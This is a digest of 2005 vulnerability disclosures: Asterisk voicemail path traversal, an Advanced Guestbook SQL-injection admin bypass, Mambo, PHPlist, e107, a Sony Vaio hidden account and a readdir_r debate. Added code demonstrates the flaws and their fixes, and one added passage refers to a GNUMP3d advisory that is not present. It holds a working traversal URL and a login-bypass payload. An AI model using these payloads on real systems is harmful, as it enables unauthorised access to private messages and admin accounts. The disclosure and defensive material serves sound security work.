
Vulnerability impact:
Low - Insecure web UI causes breach of privacy

Vulnerability information:
vmail.cgi doesn't clean a parameter passed by the web user which is later used to open a file and return a raw stream to the user. This allows any authenticated user of the voicemail system to listen to other people's messages, or to open any file with the extension .wav/.WAV on the system.

Example:
  http://asterisk.example.org/cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&password=12345&msgid=0001&format=wav

This will return /var/spool/asterisk/voicemail/default/201/INBOX/msg0001.wav when logged in as the 'extension 200' user.

Solution:
Asterisk has released patches for the vulnerabilities.
  Ensure you are running Asterisk versions > 1.0.9 / 1.2.0-beta1
  Ensure you are running Asterisk @ Home versions > 1.5 / 2.0 beta 4

References:
  Assurance.com.au advisory
  http://www.assurance.com.au/advisories/200511-asterisk.txt
  Asterisk advisory note
  http://www.asterisk.org/changelog

Credit:
Adam Pointon of Assurance.com.au
http://www.assurance.com.au/

Disclosure timeline:
  17-Oct-2005 - Discovered during a quick audit of the asterisk web ui
  18-Oct-2005 - Email sent to support and the primary author
  18-Oct-2005 - Immediate response received
  31-Oct-2005 - Patched version committed to CVS
  07-Nov-2005 - Advisory released

About us:
Assurance.com.au is a specialised information security consultancy. Our mission is to help organisations identify and secure their information assets. Our expertise concentrates in security architecture design, managed security and professional services in security testing/review and compliance. Supporting this approach are professional and managed services in the following areas:

  * Compliance Services - Penetration testing, security reviews, compliance and audit services
  * Wireless and mobility solutions - design, installation and management of IEEE 802.11a/b/g (WiFi), tele-mobility and other wireless solutions
  * UNIX-like systems, network and security advice and consulting

Assurance.com.au also provides organisations with services to support compliance to legislative, public and internal/private standards. While primarily specialising in Australian and New Zealand standards efforts, Assurance.com.au also works with other international standards related to information security. These include:

  * ISO/IEC 17799:*, AS/NZS 17799:*, BS7799
  * ISO 15408 (Common Criteria), ITSEC, TCSEC
  * ISO 13569, ISO 11131
  * ACSI33, AS2805, AS3806, AS4360, AS4539, AS8018, HB231:2001, NPP4 (privacy)
  * Sarbanes-Oxley
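The GNUMP3d advisory above (a traversal that survives an attempt to sanitize the request path) and this vmail.cgi advisory come down to the same mistake: a filesystem path is assembled from request fields and opened without deciding on the resolved path. The Python below is an added example, not code from gnump3d, Asterisk or Assurance.com.au. The first part shows why a single-pass strip of "../" is not a fix and what a containment check on the resolved path looks like; the second reproduces this advisory's URL against the spool directory it names, next to a hardened lookup that binds the mailbox to the authenticated session and allowlists the folder. The one-pass "sanitizer" is illustrative rather than gnump3d's actual code, and the folder allowlist, the four-digit msgid shape and the vmail.cgi-like parameter names are assumptions for the example.

```python
import os
import re


def strip_dotdot_once(requested):
    """One-pass 'sanitizer' that deletes every '../' it sees (illustrative, not gnump3d's code)."""
    return requested.replace("../", "")


def lookup_naive(root, requested):
    """Trusts the sanitized string and joins it under root: '....//' comes out as '../'."""
    return os.path.normpath(os.path.join(root, strip_dotdot_once(requested).lstrip("/")))


def resolve_under_root(root, relative):
    """Resolve `relative` under `root` and decide on the resolved path, not on the request string.
    Returns (resolved_path, allowed)."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, relative.lstrip("/")))
    return candidate, os.path.commonpath([root_real, candidate]) == root_real


# vmail.cgi-style message lookup. The spool directory is the one named in the advisory;
# the folder allowlist and the msgid shape are assumptions made for this example.
VOICEMAIL_ROOT = "/var/spool/asterisk/voicemail"
KNOWN_FOLDERS = {"INBOX", "Old"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")


def message_path_unsafe(context, mailbox, folder, msgid, root=VOICEMAIL_ROOT):
    """What the advisory describes: request fields joined straight into the path,
    so folder=../201/INBOX walks from mailbox 200 into mailbox 201."""
    return os.path.normpath(os.path.join(root, context, mailbox, folder, "msg%s.wav" % msgid))


def message_path_safe(session_mailbox, context, mailbox, folder, msgid, root=VOICEMAIL_ROOT):
    """Hardened lookup: the mailbox must be the one authenticated for this session, the
    folder must be a known folder name, the free-text fields must match a tight shape,
    and the resolved path must still lie under the spool directory."""
    if mailbox != session_mailbox:
        raise PermissionError("mailbox %r is not the authenticated mailbox" % mailbox)
    if folder not in KNOWN_FOLDERS:
        raise ValueError("unknown folder %r" % folder)
    if not SAFE_NAME.fullmatch(context) or not re.fullmatch(r"[0-9]{4}", msgid):
        raise ValueError("malformed context or msgid")
    relative = os.path.join(context, mailbox, folder, "msg%s.wav" % msgid)
    path, allowed = resolve_under_root(root, relative)
    if not allowed:
        raise PermissionError("resolved path leaves the voicemail spool")
    return path
```

`message_path_unsafe("default", "200", "../201/INBOX", "0001")` yields exactly the file the advisory says is returned for extension 200; `message_path_safe` refuses the same request on the folder check before any path is built, and the realpath containment check remains as the last line of defence for anything the field checks did not anticipate (symlinks inside the spool, for instance).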
Advanced Guestbook 2.2 ( SQL Injection Exploit )
Advanced Guestbook 2.2 web application (PHP, MySQL) appears vulnerable to SQL injection granting the attacker administrator access.

Target   : http://www.example.com/[GuestbookTarget]/admin.php
Username : ' or 1=1 /*
Password : (nothing, left blank)

This works on Advanced Guestbook 2.2; version 2.3.1 will fix this vulnerability.

Report By : POPO ( Pooya ) From www.Babol-Hackers.com [EMAIL PROTECTED]
Y! ID : bhs_team , pooya_0nline
---
BHS-Team We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
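As an added example (not Advanced Guestbook's code), the Python below reproduces the login bypass in an in-memory sqlite3 database standing in for MySQL. The admin table, its single row and the plaintext password column are constructed for the demo and are not the product's real schema. The vulnerable login pastes the username into the SQL text, so the leading quote closes the string literal, `or 1=1` matches every row and `/*` turns the rest of the statement, password check included, into a comment; the parameterized version binds the same input as a plain string value and matches nothing.

```python
import sqlite3

# Constructed stand-in for the guestbook's admin table: the product's real schema and
# password hashing are not given above and are not reproduced here.
SCHEMA = """
CREATE TABLE admin (username TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO admin VALUES ('admin', 's3cret');
"""

# The credentials from the report: this username and an empty password.
PAYLOAD_USERNAME = "' or 1=1 /*"
PAYLOAD_PASSWORD = ""


def open_db():
    """In-memory sqlite3 database standing in for the guestbook's MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def render_vulnerable_query(username, password):
    """The query as a vulnerable admin.php would build it: user input pasted into the SQL text."""
    return ("SELECT username FROM admin WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    """Returns the matched username or None. With the payload, the quote closes the string,
    `or 1=1` is true for every row and `/*` comments out the password comparison."""
    row = db.execute(render_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Same lookup with bound parameters: the payload is compared as a literal string value."""
    row = db.execute(
        "SELECT username FROM admin WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None
```

`render_vulnerable_query(PAYLOAD_USERNAME, PAYLOAD_PASSWORD)` makes the failure visible: the statement the database actually runs ends at `1=1`, and everything after `/*` is never evaluated, which is why the blank password is accepted.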
Re: Re: Mambo Open Source, Path disclosure
You are right, the mamboserver solution is available now:

The fix is easy, in /component/com_content/content.php, approx. line 190. Change the block FROM:

Code:
    // Paramters
    $params = new stdClass();
    if ( $Itemid ) {
        $menu = new mosMenu( $database );
        $menu->load( $Itemid );
        $params = new mosParameters( $menu->params );
    } else {
        $menu = "";
        $params = new mosEmpty();
    }

CHANGE TO READ:

Code:
    // Paramters
    $params = new stdClass();
    if ( $Itemid ) {
        $menu = new mosMenu( $database );
        $menu->load( $Itemid );
        $params = new mosParameters( $menu->params );
    } else {
        $menu = "";
        $params = new mosParameters(''); //mosEmpty();
    }

best regards
Alireza Hassani
Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/5/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> Why not:
>
> 4. Require the readdir() implementation to use state local to dirp.
>
> I've never understood the rationale behind readdir_r;

Then you never really understood the implementation, seems.

Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work.

Instead implementations keep work similar to every buffered file I/O operation. But this means that buffer content is replaced. If this happens and some thread uses readdir() instead of readdir_r(), the returned string pointer suddenly becomes invalid since it points to memory which has been replaced.

Next time, before you make such comments, ask Don Cragun to explain things to you.
Re: [Full-disclosure] Re: readdir_r considered harmful
> Then you never really understood the implementation, seems.
>
> Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work.

I don't see how that is relevant; the typical use of readdir() is as follows:

    DIR *dirp = opendir(name);
    while ((dent = readdir(dirp)) != NULL) {
        ...
    }
    closedir(dirp);

Nothing other threads do with readdir() on different dirp's will influence what dent points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't imagine the use.

> Instead implementations keep work similar to every buffered file I/O operation. But this means that buffer content is replaced. If this happens and some thread uses readdir() instead of readdir_r(), the returned string pointer suddenly becomes invalid since it points to memory which has been replaced.

Yes, the next call to readdir() *on the same dirp* may change what the previous call; but that's completely irrelevant for most uses of readdir(). Of course, an application may want to save all readdir() return values, but that is completely orthogonal to threads; there is no reason why the POSIX *thread* specification includes readdir_r().

> Next time, before you make such comments, ask Don Cragun to explain things to you.

Next time before you mail, you might want to engage your brain. There is NO reason for a thread-safe library to use readdir_r() over readdir(), with common readdir() implementations.

Casper
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> I don't see how that is relevant; the typical use of readdir() is as follows:
>
>     DIR *dirp = opendir(name);
>     while ((dent = readdir(dirp)) != NULL) {
>         ...
>     }
>     closedir(dirp);
>
> Nothing other threads do with readdir() on different dirp's will influence what dent points to.

The issue is multiple threads using the same DIR.
Re: [Full-disclosure] Re: readdir_r considered harmful
> On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> > I don't see how that is relevant; the typical use of readdir() is as follows:
> >
> >     DIR *dirp = opendir(name);
> >     while ((dent = readdir(dirp)) != NULL) {
> >         ...
> >     }
> >     closedir(dirp);
> >
> > Nothing other threads do with readdir() on different dirp's will influence what dent points to.
>
> The issue is multiple threads using the same DIR.

No, it isn't. I certainly limited the scope of my contribution to single threads reading from a DIR.

All the 80-odd uses of readdir_r() in the Solaris core source code, all can (and should) be replaced with readdir(). All have a single thread reading and reusing the same struct dirent, so readdir() could be used in POSIXly correct fashion if the following sentence in the open group's manual page was not present:

    The readdir() function need not be reentrant. A function that is not required to be reentrant is not required to be thread-safe.

I believe that this is an error in POSIX; when threadedness was added the manual page could have been changed to indicate that a single thread using the above idiom was safe. Had they done so, we would never have had to use readdir_r() and programmers would not have introduced bugs in the (mis)use of pathconf, over allocating, etc.

I would be interested in seeing any real-world use of readdir_r() in a context where readdir_r() is required (multiple threads reading from a single DIR *).

Casper
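The idiom argued for in the thread above (one private DIR per thread, plain readdir(), entry names copied out before the next call), as an added example that is not part of the thread; the names scan_dir and concurrent_scan_agree are my own, and it assumes a POSIX system with pthreads and a readable directory to scan:

```c
#include <dirent.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>

/* One job per thread: each thread opens, reads and closes its own DIR. */
struct scan_job { const char *path; int count; char last[256]; };

static void *scan_dir(void *arg)
{
    struct scan_job *job = arg;
    struct dirent *dent;
    DIR *dirp = opendir(job->path);

    job->count = dirp ? 0 : -1;
    job->last[0] = '\0';
    if (dirp == NULL) return NULL;
    /* Plain readdir() suffices: no other thread touches this dirp, so only
       our own next readdir() can replace the buffer dent points into. The
       name is still copied out, because dent is not valid past that call. */
    while ((dent = readdir(dirp)) != NULL) {
        if (strcmp(dent->d_name, ".") == 0 || strcmp(dent->d_name, "..") == 0)
            continue;
        job->count++;
        snprintf(job->last, sizeof job->last, "%s", dent->d_name);
    }
    closedir(dirp);
    return NULL;
}

/* Scan `path` from `threads` threads at once, each with a private DIR, and
   return the entry count if every thread saw the same count and the same
   final entry; -1 on any error or disagreement. */
int concurrent_scan_agree(const char *path, int threads)
{
    struct scan_job jobs[threads];
    pthread_t tid[threads];
    for (int i = 0; i < threads; i++) {
        jobs[i].path = path;
        if (pthread_create(&tid[i], NULL, scan_dir, &jobs[i]) != 0)
            return -1;
    }
    for (int i = 0; i < threads; i++)
        pthread_join(tid[i], NULL);
    for (int i = 1; i < threads; i++)
        if (jobs[i].count != jobs[0].count ||
            strcmp(jobs[i].last, jobs[0].last) != 0)
            return -1;
    return jobs[0].count;
}
```

Sharing a single DIR between threads is the one case this does not cover; there the readdir_r() (or external locking) argument from the thread applies.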
e107 Games System exploit
You can insert a highscore into game_score.php using the POST method. The system uses these variables, so a simple form will allow you to add a highscore.

    $player_name = $_POST['name'];
    $player_score = $_POST['score'];
    $game_name = $_POST['game'];

willeh
willey_wonka at hotmail dot com
[TKADV2005-11-001] Multiple vulnerabilities in PHPlist
Advisory:          Multiple vulnerabilities in PHPlist
Name:              TKADV2005-11-001
Revision:          1.0
Release Date:      2005/11/07
Last Modified:     2005/11/07
Author:            Tobias Klein (tk at trapkit.de)
Affected Software: PHPlist (all versions <= 2.10.1)
Risk:              Critical ( ) High (x) Medium (x) Low (x)
Vendor URL:        http://www.phplist.com/
Vendor Status:     Vendor has released an updated version

Overview:

PHPlist is a double opt-in newsletter manager. It is written in PHP and uses a SQL database for storing the information. Version 2.10.1 and prior contain multiple Cross Site Scripting and SQL Injection vulnerabilities. Furthermore it is possible to access and read arbitrary system files through a vulnerability in PHPlist.

Solution:

Upgrade to PHPlist 2.10.2 or newer.
http://www.phplist.com/files/

For more technical details see:
http://www.trapkit.de/advisories/TKADV2005-11-001.txt
Hidden accounts on sony vaio laptops
Sony Vaio laptops require you to create a user account the first time you start your laptop. If the user you select is not Administrator, Sony still goes ahead and creates a user Administrator with a blank password. This user does not show up in Control Panel under User Accounts, but if you start up in safe mode the laptop allows you to log in as Administrator. This gives an attacker an opportunity to gain administrative access to a computer and access to create, add, delete or modify user accounts. This is basically a backdoor account that is hidden from the user and compromises the security of all Sony Vaio laptops.

--
Securityforge: For all your security needs (http://www.securityforge.com)
Dbtech: Get the best programmers for your business (http://www.dbtech.org)